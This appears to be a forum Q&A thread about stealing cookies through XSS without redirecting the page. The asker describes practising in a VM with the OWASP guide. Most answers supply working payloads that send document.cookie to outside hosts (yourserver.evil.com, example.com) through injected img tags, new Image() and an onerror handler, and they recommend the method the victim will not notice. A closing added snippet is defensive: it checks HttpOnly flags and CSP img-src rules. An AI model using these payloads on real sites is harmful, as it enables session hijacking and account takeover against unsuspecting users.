XSS cookie stealing without redirecting to another page
I'm practicing in a VM following the OWASP guide. I know that it is possible to steal the cookie by redirecting to a "false" page etc., but I would like to steal the cookie without redirecting to another page.
So, if you have some guestbook and then you put:
```javascript
document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie
```
How can I put this into an existing page without redirecting?
Basically, what I want is: when someone clicks on the link, grab the cookie and print it somewhere on the current page. Maybe in some alt tag or whatever.
Google changed the way cookies are written. I can't get session cookies using the above method.
```javascript
document.write('cookie: ' + document.cookie)
```
If you want it sent to another server, you could include it in a non-existent image:
```javascript
document.write('<img src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />')
```
And you can even request it without writing to `document`: `image = new Image(); image.src='http://example.com?c='+document.cookie;`
I cannot edit your post, but there is a missing quote: `/>)` should be `/>')`. Thanks anyway, excellent answer.
To add onto Steve's answer, there are many different ways to achieve this. If your intention is to not have the user be aware of the stolen cookie, I would suggest the `<img>` attack Steve suggested. Although I prefer avoiding the `document.write`, since it uses up so many characters:
```html
<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>
```
This is nice and compact, but the problem is that it will recursively trigger the `onerror` handler unless an image is served from the attacker's page.
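As an added defender-side example (not code from the question or any of the answers): the two server-side controls that blunt the beacon payloads above, checked in JavaScript. `HttpOnly` keeps a cookie out of `document.cookie`, and a Content-Security-Policy `img-src` directive decides whether the `<img>`/`new Image()` request can be sent to a third-party host. The `Set-Cookie` lines and the policy are constructed sample values, and the matcher is a deliberately minimal one, not a complete CSP implementation.

```javascript
function parseSetCookie(line) {
  // Split "name=value; Attr; Attr=val" into the pair and its attributes.
  const [pair, ...attrs] = line.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), httpOnly: false, secure: false, sameSite: 'None' };
  for (const a of attrs) {
    const [k, v] = a.split('=');
    const key = k.toLowerCase();
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    else if (key === 'samesite') cookie.sameSite = v || 'None';
  }
  // document.cookie never exposes a cookie flagged HttpOnly, so only cookies
  // without that flag could ever reach a ?c= beacon like the ones above.
  cookie.readableByScript = !cookie.httpOnly;
  return cookie;
}

// Names of cookies that an injected script could read from document.cookie.
function scriptReadableCookies(setCookieLines) {
  return setCookieLines.map(parseSetCookie).filter((c) => c.readableByScript).map((c) => c.name);
}

// Minimal img-src matcher: 'self', 'none', '*', bare hosts and scheme://host.
// Real CSP matching has more rules (ports, paths, host wildcards); this is just
// enough to show whether an image beacon may leave for a third-party host.
function cspAllowsImage(csp, pageOrigin, imageUrl) {
  const directives = {};
  for (const d of csp.split(';')) {
    const [name, ...sources] = d.trim().split(/\s+/).filter(Boolean);
    if (name) directives[name] = sources;
  }
  const sources = directives['img-src'] || directives['default-src'];
  if (!sources) return true; // no applicable directive: nothing is blocked
  const img = new URL(imageUrl);
  const page = new URL(pageOrigin);
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === '*') return true;
    if (src === "'self'") return img.origin === page.origin;
    const [scheme, host] = src.includes('://') ? src.split('://') : [null, src];
    return host === img.host && (scheme === null || `${scheme}:` === img.protocol);
  });
}
```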